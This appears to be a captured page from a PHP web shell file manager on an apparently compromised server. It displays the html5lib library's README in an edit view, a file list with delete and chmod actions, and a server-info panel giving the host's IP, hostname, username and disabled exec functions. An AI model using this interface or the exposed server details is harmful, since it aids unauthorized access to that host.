Avacostn - Moslem
Choose File
DIR :
Home
/
usr
/
games
/
..
/
lib
/
environment.d
/
..
/
..
/
share
/
adobe
/
..
/
firstboot
/
..
/
doc
/
mcpp
/
..
/
python3-html5lib
/
puthuppa@68.178.173.116: ~ $
Edit File: README.rst
html5lib ======== .. image:: https://travis-ci.org/html5lib/html5lib-python.png?branch=master :target: https://travis-ci.org/html5lib/html5lib-python html5lib is a pure-python library for parsing HTML. It is designed to conform to the WHATWG HTML specification, as is implemented by all major web browsers. Usage ----- Simple usage follows this pattern: .. code-block:: python import html5lib with open("mydocument.html", "rb") as f: document = html5lib.parse(f) or: .. code-block:: python import html5lib document = html5lib.parse("<p>Hello World!") By default, the ``document`` will be an ``xml.etree`` element instance. Whenever possible, html5lib chooses the accelerated ``ElementTree`` implementation (i.e. ``xml.etree.cElementTree`` on Python 2.x). Two other tree types are supported: ``xml.dom.minidom`` and ``lxml.etree``. To use an alternative format, specify the name of a treebuilder: .. code-block:: python import html5lib with open("mydocument.html", "rb") as f: lxml_etree_document = html5lib.parse(f, treebuilder="lxml") When using with ``urllib2`` (Python 2), the charset from HTTP should be pass into html5lib as follows: .. code-block:: python from contextlib import closing from urllib2 import urlopen import html5lib with closing(urlopen("http://example.com/")) as f: document = html5lib.parse(f, transport_encoding=f.info().getparam("charset")) When using with ``urllib.request`` (Python 3), the charset from HTTP should be pass into html5lib as follows: .. code-block:: python from urllib.request import urlopen import html5lib with urlopen("http://example.com/") as f: document = html5lib.parse(f, transport_encoding=f.info().get_content_charset()) To have more control over the parser, create a parser object explicitly. For instance, to make the parser raise exceptions on parse errors, use: .. code-block:: python import html5lib with open("mydocument.html", "rb") as f: parser = html5lib.HTMLParser(strict=True) document = parser.parse(f) When you're instantiating parser objects explicitly, pass a treebuilder class as the ``tree`` keyword argument to use an alternative document format: .. code-block:: python import html5lib parser = html5lib.HTMLParser(tree=html5lib.getTreeBuilder("dom")) minidom_document = parser.parse("<p>Hello World!") More documentation is available at https://html5lib.readthedocs.io/. Installation ------------ html5lib works on CPython 2.6+, CPython 3.3+ and PyPy. To install it, use: .. code-block:: bash $ pip install html5lib Optional Dependencies --------------------- The following third-party libraries may be used for additional functionality: - ``datrie`` can be used under CPython to improve parsing performance (though in almost all cases the improvement is marginal); - ``lxml`` is supported as a tree format (for both building and walking) under CPython (but *not* PyPy where it is known to cause segfaults); - ``genshi`` has a treewalker (but not builder); and - ``chardet`` can be used as a fallback when character encoding cannot be determined. Bugs ---- Please report any bugs on the `issue tracker <https://github.com/html5lib/html5lib-python/issues>`_. Tests ----- Unit tests require the ``pytest`` and ``mock`` libraries and can be run using the ``py.test`` command in the root directory; ``ordereddict`` is required under Python 2.6. All should pass. Test data are contained in a separate `html5lib-tests <https://github.com/html5lib/html5lib-tests>`_ repository and included as a submodule, thus for git checkouts they must be initialized:: $ git submodule init $ git submodule update If you have all compatible Python implementations available on your system, you can run tests on all of them using the ``tox`` utility, which can be found on PyPI. Questions? ---------- There's a mailing list available for support on Google Groups, `html5lib-discuss <http://groups.google.com/group/html5lib-discuss>`_, though you may get a quicker response asking on IRC in `#whatwg on irc.freenode.net <http://wiki.whatwg.org/wiki/IRC>`_.
Filemanager
Name
Size
Permission
Actions
.
rwxr-xr-x
-
Actions
Rename
Delete
Chmod
..
rwxr-xr-x
-
Actions
Rename
Delete
Chmod
CHANGES.rst
7.99 KB
rw-r--r--
Actions
Edit
Delete
Chmod
Rename
README.rst
4.05 KB
rw-r--r--
Actions
Edit
Delete
Chmod
Rename
Close
Server Info
Hostname: 116.173.178.68.host.secureserver.net
IP Address: 68.178.173.116
PHP Version: 8.1.34
Server Software: Apache
HDD Total Space: 99.99 GB
HDD Free Space: 27.01 GB
Safe Mode: Disabled
Disable Functions: exec,passthru,shell_exec,system
Total Domains in Server: 1
System: Linux 116.173.178.68.host.secureserver.net 4.18.0-553.111.1.el8_10.x86_64 #1 SMP Sun Mar 8 20:06:07 EDT 2026 x86_64
User Info
Username: puthuppa
User ID: 1102
Group ID: 1104